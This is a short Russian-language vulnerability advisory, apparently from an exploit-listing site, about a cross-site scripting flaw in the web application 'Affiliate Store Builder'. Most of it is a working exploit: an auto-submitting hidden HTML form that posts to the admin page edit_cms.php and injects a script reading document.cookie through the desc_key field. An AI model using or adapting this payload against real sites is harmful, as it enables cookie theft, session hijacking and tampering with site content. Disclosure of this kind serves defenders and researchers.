Программа: Affiliate Store Builder

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных передаваемых через HTTP запросы. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

<form action='http://www.example.com/admin/edit_cms.php?page=1' name="frm"
method='post' >
<input name="title" type="hidden" value="Home"/>
<input name="type" type="hidden" value="header"/>
<input name="desc_meta" type="hidden" value="page+desc" />
<input name="desc_key" type="hidden" value='"><script>alert(document.cookie)</script>'
/>
<input name="cms_id" type="hidden" value="1" />
<input name="edit_page" type="hidden" value="Edit+Page" />
</form>
<script>
document.frm.submit();
</script>



Оставить мнение